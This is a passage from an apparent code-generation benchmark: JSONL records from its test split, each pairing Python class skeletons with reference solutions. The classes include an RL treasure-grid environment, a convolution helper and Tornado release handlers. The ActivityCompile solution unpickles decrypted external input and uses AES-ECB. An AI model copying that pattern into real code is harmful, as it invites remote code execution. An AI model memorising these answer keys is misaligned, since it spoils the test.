obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n<|end_body_0|>\n\n<|body_start_1|>\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n<|end_body_1|>\n\n<|body_start_2|>\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n<|end_body_2|>\n", "revision_id": "b51c64c867e15356c9f978839fd0040182324edd", "skeleton": "<|skeleton|>\nclass PressurizedBountifulSeaTreasure:\n\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n <|body_0|>\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n <|body_1|>\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PressurizedBountifulSeaTreasure:\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n", "source": "the_stack_v2_python_sparse", "source_path": "environments/pressurized_bountiful_sea_treasure.py", "source_repo": "Pozas91/tiadas", "split": "test", "star_events_count": 1} {"blob_id": "60782add4eab9020f5eeb94e8d669daff1d8dc72", "bodies": ["if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\ni_h = len(input)\ni_w = len(input[0])\nf_h = len(filter)\nf_w = len(filter[0])\nif (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\nif (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\nres = []\nfor i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\nreturn res", "f_h = len(filter)\nf_w = len(filter[0])\nres = 0\nfor i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\nreturn res"], "bodies_text": "<|body_start_0|>\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n <|body_0|>\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000302", "length_bytes": 1599, "license_type": "no_license", "methods": [{"docstring": "input为输入矩阵,filter为卷积核,返回卷积之后的结果", "name": "test", "signature": "def test(self, input, filter, padding, stride)"}, {"docstring": "row,col为卷积操作在input的起始位置", "name": "sum", "signature": "def sum(self, input, row, col, filter)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000017", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def test(self, input, filter, padding, stride): input为输入矩阵,filter为卷积核,返回卷积之后的结果\n- def sum(self, input, row, col, filter): row,col为卷积操作在input的起始位置", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def test(self, input, filter, padding, stride): input为输入矩阵,filter为卷积核,返回卷积之后的结果\n- def sum(self, input, row, col, filter): row,col为卷积操作在input的起始位置\n\n<|skeleton|>\nclass Solution:\n\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n <|body_0|>\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n<|end_body_1|>\n", "revision_id": "ef6aee94c7990d734271c204034ec273b665226d", "skeleton": "<|skeleton|>\nclass Solution:\n\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n <|body_0|>\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "卷积操作.py", "source_repo": "godzzbboss/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "17af770d19b13bf3966e0867d49c3280d13c0059", "bodies": ["try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\nexcept Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''", "code = str(code)\ntry:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\nexcept Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None"], "bodies_text": "<|body_start_0|>\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n<|end_body_0|>\n\n<|body_start_1|>\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ActivityCompile", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ActivityCompile:\n\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n <|body_0|>\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n<|end_body_0|>\n\n<|body_start_1|>\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000303", "length_bytes": 1840, "license_type": "no_license", "methods": [{"docstring": "deprecated later", "name": "encrypt_activity_compile_to_code", "signature": "def encrypt_activity_compile_to_code(activity_compile)"}, {"docstring": "deprecated later", "name": "decrypt_code_to_activity_compile", "signature": "def decrypt_code_to_activity_compile(code)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003637", "prompt": "Implement the Python class `ActivityCompile` described below.\n\nClass description:\nImplement the ActivityCompile class.\n\nMethod signatures and docstrings:\n- def encrypt_activity_compile_to_code(activity_compile): deprecated later\n- def decrypt_code_to_activity_compile(code): deprecated later", "prompted_full_text": "Implement the Python class `ActivityCompile` described below.\n\nClass description:\nImplement the ActivityCompile class.\n\nMethod signatures and docstrings:\n- def encrypt_activity_compile_to_code(activity_compile): deprecated later\n- def decrypt_code_to_activity_compile(code): deprecated later\n\n<|skeleton|>\nclass ActivityCompile:\n\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n <|body_0|>\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n<|end_body_0|>\n\n<|body_start_1|>\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n<|end_body_1|>\n", "revision_id": "0cd69ba5bf3c962c491fb7a814539929112def8f", "skeleton": "<|skeleton|>\nclass ActivityCompile:\n\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n <|body_0|>\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ActivityCompile:\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "app/models/activity_compile.py", "source_repo": "flyakite/tracker", "split": "test", "star_events_count": 0} {"blob_id": "cd16117b7faee71f063c9cbe25eb48eaec6c1a2d", "bodies": ["username = self.get_cookie('username')\npage = int(self.get_argument('page', 1))\nsearchKey = self.get_argument('searchKey', None)\npagesize = int(self.get_argument('pagesize', self._PageSize))\ntotalquery = self.db.query(ReadyReleaseServer.Id)\nNgReleaseObj = self.db.query(ReadyReleaseServer)\nif searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\nself.Result['total'] = totalquery.count()\nserverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\nself.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\nself.Result['username'] = username\nself.finish(self.Result)", "data = json.loads(self.request.body.decode('utf-8'))\nobjTask = ReadyReleaseServer()\ndomainname = data['params'].get('DomainName', None)\nobjTask.name = ''.join(domainname.split('-'))\nobjTask.DomainName = domainname + '.pdyf.open.com.cn'\nobjTask.HealthExam = data['params'].get('HealthExam', None)\nobjTask.Port = int(data['params'].get('Port', None))\nobjTask.Publisher = self.get_cookie('username')\nself.db.add(objTask)\nself.db.commit()\ntasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\nself.Result['rows'] = 1\nself.Result['info'] = u'创建成功'\nself.finish(self.Result)", "pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\ndomainname = pro.DomainName.split('.')[0]\ntasks.ready_Release_del.delay(domainname)\nself.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\nself.db.commit()\nself.Result['info'] = u'删除nginx及consul成功'\nself.finish(self.Result)"], "bodies_text": "<|body_start_0|>\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n<|end_body_0|>\n\n<|body_start_1|>\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n<|end_body_1|>\n\n<|body_start_2|>\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ReadyHandler", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReadyHandler:\n\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n <|body_0|>\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n <|body_1|>\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n<|end_body_0|>\n\n<|body_start_1|>\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n<|end_body_1|>\n\n<|body_start_2|>\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000304", "length_bytes": 2915, "license_type": "no_license", "methods": [{"docstring": "获取预生产发布信息", "name": "get", "signature": "def get(self, ident)"}, {"docstring": "预生产创建nginx及consul", "name": "post", "signature": "def post(self, ident=0)"}, {"docstring": "预生产删除nginx及consul", "name": "delete", "signature": "def delete(self, ident)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001502", "prompt": "Implement the Python class `ReadyHandler` described below.\n\nClass description:\nImplement the ReadyHandler class.\n\nMethod signatures and docstrings:\n- def get(self, ident): 获取预生产发布信息\n- def post(self, ident=0): 预生产创建nginx及consul\n- def delete(self, ident): 预生产删除nginx及consul", "prompted_full_text": "Implement the Python class `ReadyHandler` described below.\n\nClass description:\nImplement the ReadyHandler class.\n\nMethod signatures and docstrings:\n- def get(self, ident): 获取预生产发布信息\n- def post(self, ident=0): 预生产创建nginx及consul\n- def delete(self, ident): 预生产删除nginx及consul\n\n<|skeleton|>\nclass ReadyHandler:\n\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n <|body_0|>\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n <|body_1|>\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n<|end_body_0|>\n\n<|body_start_1|>\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n<|end_body_1|>\n\n<|body_start_2|>\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n<|end_body_2|>\n", "revision_id": "827a2539f26048ee885882425a2e52a086e4caa4", "skeleton": "<|skeleton|>\nclass ReadyHandler:\n\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n <|body_0|>\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n <|body_1|>\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReadyHandler:\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n", "source": 